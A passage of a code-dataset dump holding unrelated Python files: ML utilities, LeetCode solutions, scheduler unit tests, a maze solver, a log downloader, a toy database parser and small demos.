latent_dim_object_vector=24)\r\n\r\n","repo_name":"metodj/FGP-VAE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20978,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"13723476356","text":"import tensorflow as tf\nimport numpy as np\nimport io\nimport PIL.Image\n\n\nclass Logger(object):\n def __init__(self, log_dir):\n self.writer = tf.summary.create_file_writer(log_dir)\n\n def scalar_summary(self, tag, value, step):\n with self.writer.as_default():\n tf.summary.scalar(tag, value, step=step)\n\n def image_summary(self, tag, images, step):\n with self.writer.as_default():\n image_summaries = []\n for i, img in enumerate(images):\n # Convert image to PIL Image object\n pil_img = PIL.Image.fromarray(img)\n\n # Create a BytesIO object to store the image data\n image_buffer = io.BytesIO()\n pil_img.save(image_buffer, format='PNG')\n\n # Create an Image Tensor\n img_tensor = tf.image.decode_image(image_buffer.getvalue(), channels=4)\n\n # Add image summary\n image_summaries.append(tf.summary.image(f'{tag}/{i}', [img_tensor], step=step))\n\n tf.summary.experimental.write_raw_pb(tf.summary.experimental.serialize_many_summary(image_summaries), step=step)\n\n def histo_summary(self, tag, values, step, bins=1000):\n with self.writer.as_default():\n tf.summary.histogram(tag, values, step=step, buckets=bins)","repo_name":"AbhishekKaushikCV/SEGMENT3D","sub_path":"train/common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21308396624","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n if len(nums) <= 3:\n return max(nums)\n \n def houseRobbed(index, bound):\n if index > bound:\n return 0\n \n if index in memo:\n return memo[index]\n \n memo[(index)] = max(nums[index] + houseRobbed(index + 2, bound), houseRobbed( index + 1, bound))\n return memo[(index)]\n \n memo = {}\n FirstHouseRobbed = houseRobbed(0, len(nums) - 2)\n \n memo.clear()\n LastHouseRobbed = houseRobbed(1, len(nums) - 1)\n \n return max(FirstHouseRobbed, LastHouseRobbed)\n ","repo_name":"YeabAM/A2SV","sub_path":"0213-house-robber-ii/0213-house-robber-ii.py","file_name":"0213-house-robber-ii.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"29093498821","text":"\"\"\"Unit tests for sched_funcs.py decorators\"\"\"\n\nimport os\nimport sys\nimport time\nimport datetime\nimport logging\nimport functools\nimport unittest\n\nimport mock\nimport pytest\nimport schedule\nfrom schedule import every\n\nfrom node_tools.helper_funcs import NODE_SETTINGS\nfrom node_tools.helper_funcs import AttrDict\nfrom node_tools.helper_funcs import send_announce_msg\nfrom node_tools.network_funcs import echo_client\nfrom node_tools.network_funcs import get_net_cmds\nfrom node_tools.network_funcs import run_net_cmd\nfrom node_tools.network_funcs import send_wedged_msg\nfrom node_tools.sched_funcs import catch_exceptions\nfrom node_tools.sched_funcs import run_until_success\nfrom node_tools.sched_funcs import show_job_tags\n\ntry:\n from datetime import timezone\n utc = timezone.utc\nexcept ImportError:\n from schedule.timezone import UTC\n utc = UTC()\n\n\ndef make_mock_job(name=None):\n job = mock.Mock()\n job.__name__ = name or 'job'\n return job\n\n\nclass mock_datetime(object):\n \"\"\"\n Monkey-patch datetime for predictable results\n \"\"\"\n def __init__(self, year, month, day, hour, minute, second=0):\n self.year = year\n self.month = month\n self.day = day\n self.hour = hour\n self.minute = minute\n self.second = second\n\n def __enter__(self):\n class MockDate(datetime.datetime):\n @classmethod\n def today(cls):\n return cls(self.year, self.month, self.day)\n\n @classmethod\n def now(cls, tz=None):\n return cls(self.year, self.month, self.day,\n self.hour, self.minute, self.second).replace(tzinfo=tz)\n\n self.original_datetime = datetime.datetime\n datetime.datetime = MockDate\n\n def __exit__(self, *args, **kwargs):\n datetime.datetime = self.original_datetime\n\n\nclass ScheduleTests(unittest.TestCase):\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_job_info(self):\n with mock_datetime(2010, 1, 6, 14, 16):\n mock_job = make_mock_job(name='info_job')\n info_job = every().minute.do(mock_job, 1, 7, 'three')\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == info_job\n assert repr(info_job)\n assert info_job.job_name is not None\n s = info_job.info\n assert 'info_job' in s\n assert 'three' in s\n assert '2010' in s\n assert '14:16' in s\n\n def test_cancel_job(self):\n @show_job_tags()\n def stop_job():\n return schedule.CancelJob\n mock_job = make_mock_job()\n\n every().second.do(stop_job)\n mj = every().second.do(mock_job)\n assert len(schedule.jobs) == 2\n\n schedule.run_all()\n assert len(schedule.jobs) == 1\n assert schedule.jobs[0] == mj\n\n schedule.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n schedule.default_scheduler.cancel_job('Not a job')\n assert len(schedule.jobs) == 1\n\n schedule.cancel_job(mj)\n assert len(schedule.jobs) == 0\n\n def test_run_net_cmd_sup(self):\n cmd_up0 = get_net_cmds(self.bin_dir, 'fpn0', True)\n cmd_up1 = get_net_cmds(self.bin_dir, 'fpn1', True)\n\n every().second.do(run_net_cmd, cmd_up0).tag('net-change')\n every().second.do(run_net_cmd, cmd_up1).tag('net-change')\n\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n def test_run_net_cmd_sdown(self):\n NODE_SETTINGS['route_dns_53'] = True\n NODE_SETTINGS['private_dns_only'] = True\n\n cmd_down0 = get_net_cmds(self.bin_dir, 'fpn0', False)\n cmd_down1 = get_net_cmds(self.bin_dir, 'fpn1', False)\n\n every().second.do(run_net_cmd, cmd_down0).tag('net-change')\n every().second.do(run_net_cmd, cmd_down1).tag('net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 2)\n\n schedule.run_all(0, 'net-change')\n schedule.run_all(0, 'net-change')\n self.assertEqual(len(schedule.jobs), 0)\n\n\nclass SendMsgTest(unittest.TestCase):\n \"\"\"\n Note the input for this test case is just nodeState.fpn_id and\n mainly tests the warning generated by the nanomsg timeout.\n \"\"\"\n def setUp(self):\n super(SendMsgTest, self).setUp()\n from node_tools import state_data as st\n\n schedule.clear()\n self.default_state = st.defState\n self.state = st.fpnState\n self.cfg = st.cfg_msgs\n self.addr = '127.0.0.1'\n\n def tearDown(self):\n from node_tools import state_data as st\n\n # defState = s.defState\n\n st.fpnState = self.default_state\n super(SendMsgTest, self).tearDown()\n\n def test_send_echo_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_cfg_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n # expected command result is a list so the return\n # result for echo_client() is actually None\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_announce_msg(fpn_id, None, send_cfg=True)\n schedule.run_all()\n\n with self.assertWarns(RuntimeWarning) as err:\n result = echo_client(fpn_id, self.addr, send_cfg=True)\n # print(result)\n self.assertIs(result, None)\n\n def test_send_wedged_no_responder(self):\n\n nodeState = AttrDict.from_nested_dict(self.state)\n fpn_id = nodeState.fpn_id\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n send_wedged_msg()\n schedule.run_all()\n\n # expected command result is a list\n result = send_wedged_msg(self.addr)\n # print(result)\n self.assertEqual([], result)\n\n\nclass NetCmdTests(unittest.TestCase):\n \"\"\"\n Slightly better tests (than NetCmdTest) using schedule.\n \"\"\"\n def setUp(self):\n self.bin_dir = os.path.join(os.getcwd(), 'test/fpnd/')\n schedule.clear()\n\n def test_run_net_cmd_false(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/false']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n\n def test_get_net_cmds_bad_path(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n bad_dir = '/tmp/foobar/'\n cmd = ['/tmp/foo0-down.sh']\n self.assertFalse(os.path.isdir(bad_dir))\n res = get_net_cmds(bad_dir, 'fpn0', True)\n # print(cmd)\n self.assertIsNone(res)\n state, result, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n # print(result)\n\n def test_run_net_cmd_not_found(self):\n mock_job = make_mock_job()\n tj = every().second.do(mock_job)\n\n cmd = ['/bin/tuna']\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertRaises(FileNotFoundError)\n\n def test_run_net_cmd_up0(self):\n # expected command result is 'Success' so the return\n # result is actually <schedule.CancelJob>\n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', True)\n tj = every().second.do(mock_job)\n\n result = run_net_cmd(cmd)\n self.assertIsInstance(result, type)\n self.assertIn('CancelJob', str(result))\n\n def test_run_net_cmd_down0(self):\n # expected command result is 'Fail' so the return\n # result is the output of run_net_cmd()\n mock_job = make_mock_job()\n cmd = get_net_cmds(self.bin_dir, 'fpn0', False)\n tj = every().second.do(mock_job)\n\n state, res, ret = run_net_cmd(cmd)\n self.assertFalse(state)\n self.assertEqual(res, b'')\n self.assertEqual(ret, 1)\n","repo_name":"freepn/fpnd","sub_path":"test/test_sched_decorators.py","file_name":"test_sched_decorators.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":293,"dataset":"github-code","pt":"16"} +{"seq_id":"28330020234","text":"adj = []\ns = ['+++++++++++++++++++++++',\n 'S + + +',\n '+ +++ + ++++ + ++++++ +',\n '+ + + + + + +',\n '+ ++++++++ +++ + + ++++',\n '+ + + + + + ++',\n '++++ + +++ + +++++ + +',\n '+ + + + +',\n '+ ++++++ + ++++++ +++++',\n '+ + + +',\n '+++++++++++++++++++++F+']\n\nfor t in s:\n adj.append(list(t))\n\nprint(adj)\ncol = len(adj[0])\nrow = len(adj)\nprint('Row = %d' % row)\nprint('Column = %d' % col)\n\nqueue = []\n\n\ndef stringify(i, j):\n s = ''\n s = s + str(i) + '-' + str(j)\n return s\n\n\ndef maze():\n i = 0\n while i < len(adj):\n for j in range(len(adj[i])):\n print(adj[i][j], end=\" \")\n print()\n i += 1\n\n\ndef maze_solver(i, j):\n maze()\n print()\n print()\n # print('Remaining Path Options => %s' % queue)\n adj[i][j] = '.'\n count = 0\n record = []\n if adj[i + 1][j] == ' ':\n count += 1\n record.append(stringify(i + 1, j))\n\n if adj[i - 1][j] == ' ':\n count += 1\n record.append(stringify(i - 1, j))\n\n if adj[i][j + 1] == ' ':\n count += 1\n record.append(stringify(i, j + 1))\n\n if adj[i][j - 1] == ' ':\n count += 1\n record.append(stringify(i, j - 1))\n\n if adj[i + 1][j] == 'F':\n adj[i + 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i + 1, j))\n quit()\n\n if adj[i - 1][j] == 'F':\n adj[i - 1][j] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i - 1, j))\n quit()\n\n if adj[i][j + 1] == 'F':\n adj[i][j + 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j + 1))\n quit()\n\n if adj[i][j - 1] == 'F':\n adj[i][j - 1] = 'X'\n maze()\n print('We Have Reached in Our Destination (%d, %d)' % (i, j - 1))\n quit()\n\n if count == 1:\n l = record[0].split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n if count > 1:\n queue.extend(record)\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n else:\n l = queue.pop(0).split('-')\n r, s = (int(l[0]), int(l[1]))\n maze_solver(r, s)\n\n\nprint('Initial Stage')\np = 0\nwhile p < len(adj):\n for q in range(len(adj[p])):\n if adj[p][q] == 'S':\n print('Fun Begins at (%d, %d)' % (p, q))\n maze_solver(p, q)\n else:\n pass\n\n p += 1\n","repo_name":"simon619/Maze-Solving-Using-Breadth-First-Search","sub_path":"SimonsMaze.py","file_name":"SimonsMaze.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70414991687","text":"import urllib.request\nimport os\nimport pathlib\nimport gzip\n\nimport setup as s\n\n# ##################################################################\n# pwaFileImport\n# ##################################################################\ndef pwaFileImport(webRetrieve=False, unzipfiles=True, maxFiles = 5):\n \"\"\"\n Import files froms website https://www.cs.huji.ac.il\n Logs (of real life) of set of job times.\n Retrieve file catalog : address setted in constant s.URL_CATALOG_PWA\n reads this file which contains the url addresses of the time files\n and each file is retreived in the folder FOLDER_ZIPPEDLOG,\n to be unzipped in the folder FOLDER_PWA\n input\n :param webRetrieve: True : retreive files from website.\n :param unzipfiles : True : unzip files from zippedLog folder to PWA folder\n :param maxFiles : number of files to retreive from website.\n use 0 to retreive all files\n \"\"\"\n tabFiles = []\n\n #-------------------------------\n # log directory\n # s.folder creates requested directories if not exists\n # curDir = os.path.abspath(os.curdir)\n #-------------------------------\n zipDir = s.folder(s.FOLDER_ZIPPEDLOG)\n logDir = s.folder(s.FOLDER_PWA)\n \n #-------------------------------\n # Web resource web --> zipDir\n #-------------------------------\n if webRetrieve:\n # read distant file\n fichierNom = s.URL_CATALOG_PWA # url of files log catalog \n req = urllib.request.Request(url=fichierNom) \n fichierId = urllib.request.urlopen(req)\n\n # put the list on a list tabFiles\n contentsLine = fichierId.readline().decode('utf-8')\n while contentsLine:\n tabFiles.append(contentsLine.rstrip(\"\\n\")) # erase \\n caracter from the string \n contentsLine = fichierId.readline().decode('utf-8')\n\n # close the file\n fichierId.close()\n \n # now i have my list of pwa gz logs\n n=0\n for file in tabFiles:\n n+=1\n if (n > maxFiles or maxFiles==0):\n break\n fileInfo = pathlib.Path(file)\n # destFile = os.path.join(zipDir, fileInfo.name)\n destFile = zipDir+\"/\"+fileInfo.name\n urllib.request.urlretrieve(file, destFile)\n print(\"file ========> \"+destFile+\" retrieved.\")\n\n if unzipfiles == True:\n unzipGZ(fileInfo.name, zipDir, logDir)\n# ##################################################################\n# unzipGZ\n# ##################################################################\ndef unzipGZ(fileNameGZ, fromDir, destDir):\n \"\"\"\n Unzip the file named fromDir+fileNameGZ\n in the folder destDir. \n \"\"\"\n #\n fromFile = fromDir+s.sepDir()+fileNameGZ\n destFile = destDir+s.sepDir()+fileNameGZ.rstrip(\".gz\")\n #\n print(\"Unzipping file %s in %s\" % (fromFile, destDir))\n #\n src = gzip.GzipFile(fromFile, 'rb')\n sRead = src.read()\n src.close()\n d = open(destFile, 'wb')\n d.write(sRead)\n d.close()\n print(\"Unzipped.\")\n\n# ##################################################################\n# pwaFileRead\n# ##################################################################\ndef pwaFileRead(fileName):\n \"\"\"\n Reads the log file according to the predefined format,\n to create an instance (set of times)\n called from matrix.py\n \"\"\"\n with open(fileName, 'r') as f:\n text = f.read()\n # END WITH \n times = []\n for line in text.split('\\n'):\n line = line.strip()\n if not(line) or line[0] == \";\":\n continue\n # END IF\n jobId, submitTime, waitTime, runTime, nbProc, avgCPUtime, mem, reqProc, reqTime, reqMem, status, uId, gId, appId, queueId, partitionId, precedingJob, timefromPrecedingJob = [float(x) for x in line.split()]\n if runTime != 0:\n # times += [runTime]\n times.append(runTime)\n # END IF\n # END FOR\n return times\n# ##################################################################\n# pwaFileChoice():\n# ##################################################################\ndef pwaFileChoice(chooseMode = None):\n \"\"\"\n finds the files contained in the \"FOLDER_PWA\" directory,\n and proposes to choose them, or not (for test instance creation).\n :Param chooseMode : None Asc for use the current files / 1 Always answer YES, 0 Always answer NO, \n Returns the list of selected files as a list files[]\n \"\"\"\n files = []\n logDir = s.folder(s.FOLDER_PWA)\n content = os.listdir(logDir)\n for item in content:\n if chooseMode == None:\n r = int(input(\"Use this file %s ? (1 yes 0 no) : \" % (item)))\n else:\n r=chooseMode\n # END IF \n if r == 1:\n files.append(logDir+s.sepDir()+item)\n # END IF\n # END FOR\n print(files)\n return files\n\n##TO TEST THIS SCRIPT\n##pwaFileImport(True, True)\n##logTimes = pwaFileRead(logFolder()+\"/NASA-iPSC-1993-3.1-cln.swf\")\n##print(logTimes)\n##pwaFileChoice()\n\n\n","repo_name":"fColas68/appCmax","sub_path":"pwa.py","file_name":"pwa.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15511874337","text":"# 常规写法 获取字符串中的数字\ns = 'shidi33d6662bb99fff6d5'\nfor i in s:\n # 判断当前字符是不是一个数字 TF\n if i.isnumeric():\n print(i)\n\n# 正则匹配\nimport re # 内置 不需要下载\n# findall(匹配规则,匹配内容) 返回形式是列表\nres = re.findall('\\d+',s)\nprint(res)\n\n\n","repo_name":"xiaoguiy/python-scrapy","sub_path":"10-正则(上)/上课代码/04-正则概述.py","file_name":"04-正则概述.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7402966182","text":"n=int(input())\r\np_list=[]\r\n\r\nfor i in range(n):\r\n w,h=map(int,input().split())\r\n p_list.append([w,h])\r\n \r\nfor i in p_list:\r\n grade=1\r\n for j in p_list:\r\n if i[0] < j[0] and i[1] < j[1]:\r\n grade+=1\r\n print(grade)","repo_name":"parkminji03/Study_kt","sub_path":"11.브루트포스/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25758875291","text":"# Importing libraries\nimport re\nimport storage as db\nimport sys\n\nstorage = db.storager()\n\n# Parser process:\n# Parsing words -- DONE!\n# Exit function -- DONE!\n# Create function -- DONE!\n# Insert function -- DONE!\n# Select function -- edit select in storager with order\n# Delete finction -- edit select in storager with condition\n\n# Function to parse words into commands and find command type if it is possible\ndef parse(self, words):\n command = re.findall(r'\\S+', words)\n print(command)\n command_type = command[0]\n command_type = command_type.upper()\n symbols = ['(', ')', ',', '.', ';']\n\n # Find command type and arguments or print command error\n if command_type not in Parser.COMMANDS:\n print(f\"Command '{command_type}' not found!\")\n command_exec = 0\n\n elif command_type == 'EXIT': \n print('Stopping program...')\n Parser.exit_command = True\n sys.exit() \n\n elif command_type == 'CREATE':\n table_name = command[1]\n if re.match(Parser.NAMES, table_name) and table_name.upper() not in Parser.COMMANDS and table_name.upper() not in Parser.SPECIAL_WORDS:\n columns = []\n i = 2\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n # Searching indexing columns and mark them to indexed_flag = True\n while i < len(command):\n if i + 1 < len(command):\n indexed_word = command[i + 1]\n if indexed_word.upper() == 'INDEXED':\n indexed_flag = True\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += int(indexed_flag)\n else:\n indexed_flag = False\n columns.append([command[i], indexed_flag])\n i += 1\n print(columns)\n command_exec = storage.create_db(table_name, columns)\n else:\n print('Invalid table name!')\n\n elif command_type == 'INSERT':\n values = []\n i = 2\n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n values.append(command[i])\n i += 1\n print(values)\n command_exec = storage.insert_db(table_name, values)\n\n elif command_type == 'SELECT':\n columns = []\n condition = []\n order = []\n i = 1\n # Detecting selection columns\n from_pos = 0\n where_pos = 0\n order_pos = 0\n\n # Deleting excessive symbols\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n\n while i < len(command):\n if command[i].upper() == 'FROM':\n from_pos = i\n if command[i].upper() == 'WHERE':\n where_pos = i\n if command[i].upper() == 'ORDER_BY':\n order_pos = i\n i += 1\n\n for i in range(1, from_pos):\n columns.append(command[i])\n table_name = command[from_pos + 1]\n if where_pos != 0 and order_pos != 0:\n for i in range(where_pos + 1, order_pos):\n condition.append(command[i])\n elif where_pos != 0 and order_pos == 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n if order_pos != 0:\n for i in range(order_pos + 1, len(command)):\n order.append(command[i])\n print(f\"t_n {table_name}\")\n print(f\"columns {columns}\")\n print(f\"condition {condition}\")\n print(f\"order {order}\")\n command_exec = storage.select_db(table_name, columns, condition, order)\n\n elif command_type == 'DELETE':\n condition = []\n where_pos = 0\n i = 2\n\n for indx, word in enumerate(command):\n exch = word\n first = exch[0]\n last = exch[-1]\n #print(exch)\n #print(first, last)\n if first in symbols:\n exch = exch[1:]\n last = exch[-1]\n if last in symbols:\n exch = exch[:-1]\n command[indx] = exch\n #print(exch)\n #print(command[indx])\n \n # Detecting table_name\n if command[1].upper() not in Parser.COMMANDS and command[1].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[1]\n elif command[2].upper() not in Parser.COMMANDS and command[2].upper() not in Parser.SPECIAL_WORDS:\n table_name = command[2]\n i += 1\n print(f\"table_name -- {table_name}\")\n print(f\"len(command) -- {len(command)}\")\n print(f\"i -- {i}\")\n while i < len(command):\n if command[i].upper() == 'WHERE':\n where_pos = i\n i += 1\n if where_pos != 0:\n for i in range(where_pos + 1, len(command)):\n condition.append(command[i])\n print(f\"condition -- {condition}\")\n command_exec = storage.delete_db(table_name, condition)\n \n return command_exec\n\n\n# Parser class\nclass Parser:\n NAMES = r\"[a-zA-Z][a-zA-Z0-9_]*\"\n COMMANDS = {'CREATE', 'INSERT', 'SELECT', 'DELETE', 'EXIT'}\n SPECIAL_WORDS = {'INDEXED', 'INTO', 'FROM', 'WHERE', 'ORDER_BY'}\n\n def __init__(self):\n input_command = ''\n input_accept = True\n exit_command = False\n print('Use \"EXIT\" command to stop this program')\n\n # Command input\n while not exit_command:\n while input_accept:\n input_command += ' ' + input('>>').strip()\n if ';' in input_command:\n for words in input_command.split(';'):\n if words:\n #print(words)\n parse(self, words)\n input_accept = False\n input_accept = True\n\n #command = re.findall(r'\\S+', words)\n #print(command)\n\nif __name__ == '__main__':\n parser = Parser()\n","repo_name":"AntoshaGodx/aaf-labs-2021","sub_path":"shevchenko_fi-92_kozlovska_fi-92/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37415723791","text":"\"\"\"2427. Number of Common Factors\"\"\"\n\n\nclass Solution:\n def commonFactors(self, a: int, b: int) -> int:\n count = 1\n i = 2\n\n while i <= min(a, b):\n if a % i == 0 and b % i == 0:\n count += 1\n i += 1\n\n return count\n","repo_name":"linzeyang/leetcode-solutions","sub_path":"easy/2427.py","file_name":"2427.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2216404079","text":"from torch.utils.data import Dataset\nimport numpy as np\n\n\nclass DrumDataset(Dataset):\n def __init__(self, data_list):\n self.data_list = data_list\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n curr_data = self.data_list[idx]\n skel = curr_data['skeleton']\n note = curr_data['note']\n vel = curr_data['vel']\n mt = curr_data['mt']\n tempo = curr_data['tempo']\n fname = curr_data['midi_f']\n genre = curr_data['genre']\n note_density_idx = curr_data['note_density_idx']\n vel_contour = curr_data['vel_contour']\n time_contour = curr_data[\"time_contour\"]\n # time_contour =\n\n # skel = skel[ np.newaxis, :]\n # note = note[np.newaxis, :]\n # vel = vel* 127 // 4\n\n # range1 = 2\n # range2 = 100\n\n # mt = (range2 * (mt + (range1 /2))) / range1 - (range2/2) + 50\n\n # vel = vel / 32\n # mt = mt / 100\n\n n_inst = np.sum(note, 0)\n n_inst[n_inst > 1] = 1\n\n n_inst = int(np.sum(n_inst)) - 1\n\n return {\n \"skel\": skel,\n \"note\": note,\n \"vel\": vel,\n \"mt\": mt,\n \"tempo\": tempo,\n \"fname\": fname,\n \"genre\": genre,\n \"note_density_idx\": note_density_idx,\n \"vel_contour\": vel_contour,\n # \"vel_accent\": vel_accent,\n \"time_contour\": time_contour,\n \"n_inst\": n_inst\n # \"time_mode\": time_mode\n # \"deco\": deco\n }\n","repo_name":"kyungyunlee/PocketVAE","sub_path":"src/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"34552216105","text":"def def_casos(T):\r\n casos_valor = []\r\n casos_keys = []\r\n for i in range(T):\r\n value = int(input(f\"Ingrese #Caso {i+1}: \"))\r\n while(value>200 or value<0):\r\n value = int(input(\"Porfavor, ingrese un #Caso entre 0 y 200: \")) \r\n if(value>=0 and value<=200):\r\n casos_valor.append(value)\r\n casos_keys.append(f\"Caso #{i+1}\")\r\n\r\n return casos_keys, casos_valor\r\n\r\ndef ciclo_bleatrix(N, casos_keys):\r\n \"\"\"\r\n x = []\r\n for i in range(0,10):\r\n x.append(i)\r\n \"\"\"\r\n validador = [0,1,2,3,4,5,6,7,8,9]\r\n valores_keys = []\r\n print(N)\r\n\r\n for valor in N:\r\n i=0\r\n compara = []\r\n while((compara!=validador)):\r\n i+=1\r\n x = valor * i\r\n for digits in str(x):\r\n compara.append(int(digits))\r\n compara = list(dict.fromkeys(compara))\r\n compara.sort()\r\n if(compara == validador):\r\n valores_keys.append(x)\r\n break\r\n elif((valor==0)):\r\n valores_keys.append(\"INSOMNIA\")\r\n break\r\n\r\n return dict(zip(casos_keys, valores_keys))\r\n \r\n\r\nif __name__ == \"__main__\":\r\n T = int(input(\"Introducir cantidad de casos a probar: \"))\r\n while(T is None or T>100 or T<1):\r\n T = int(input(\"Porfavor, ingrese un valor entre 1 y 100: \"))\r\n\r\n T_par = def_casos(T)\r\n print(ciclo_bleatrix(T_par[1], T_par[0]))\r\n ","repo_name":"FrancoTruffa/technicaltest","sub_path":"exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36707527496","text":"class Solution:\n def add(self, a: int, b: int) -> int:\n \"\"\"\n 不用加法运算做加法\n :param a:\n :param b:\n :return:\n 复杂度分析:时间复杂度O()\n \"\"\"\n x = 0xffffffff\n a = a & x\n b = b & x\n while b != 0:\n # a = a ^ b\n # b = (a & b) << 1 & x\n # 上面和下面的写法不同,计算结果也不相同,并排写法能同时运算结果,互不影响,分别计算非进位和和进位和\n a, b = (a ^ b), (a & b) << 1 & x\n print(\"a:{}\".format(a))\n print(\"b:{}\".format(b))\n return a if a <= 0x7fffffff else ~(a ^ x) # 若补码 a 为负数( 0x7fffffff 是最大的正数的补码 ),需执行 ~(a ^ x) 操作,将补码还原至 Python 的存储格式,~(a ^ x) 是将 32 位以上的位取反,1 至 32 位不变。\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.add(a=1, b=2))","repo_name":"Cecilia520/algorithmic-learning-leetcode","sub_path":"cecilia-python/剑指offer/chapter-7/Add.py","file_name":"Add.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"zh","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"24850120477","text":"\"\"\"\n创建csv对象\ncsv.writer(fileobj)\n放入一个可迭代类型对象,写在一行,每一个元素是一列\ncsv.writerow(iterable)\n\n放入一个可迭代类型的元素,这个元素中的每一个子元素也必须可迭代\n每一个子元素占一行,子元素又会被拆开占据多列,长度取决于自身\ncsv.writerows(Iterable(Iterable))\n\n\"\"\"\nimport csv\n\n# 创建流对象\nfile = open(\"demo07.csv\", mode=\"w\", encoding=\"utf-8\")\n# 创建csv对象\ncsv_writer = csv.writer(file)\n# 写入内容\ncsv_writer.writerow([\"a\", \"b\", \"c\", \"d\", \"e\"])\n\n# csv_writer.writerows([[1, 2, 3], \"world\", \"say\", \"byebye\"])\n# 关闭流\nfile.close()\n","repo_name":"xvjingcheng/superman","sub_path":"千峰的每天/第十三天12.27/代码/Day13/07.csv写入文件.py","file_name":"07.csv写入文件.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23870524793","text":"#!/bin/env python3\nimport jwt\n\nfrom cryptography.x509 import load_pem_x509_certificate\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\n\npayload_data = {\n \"iss\": 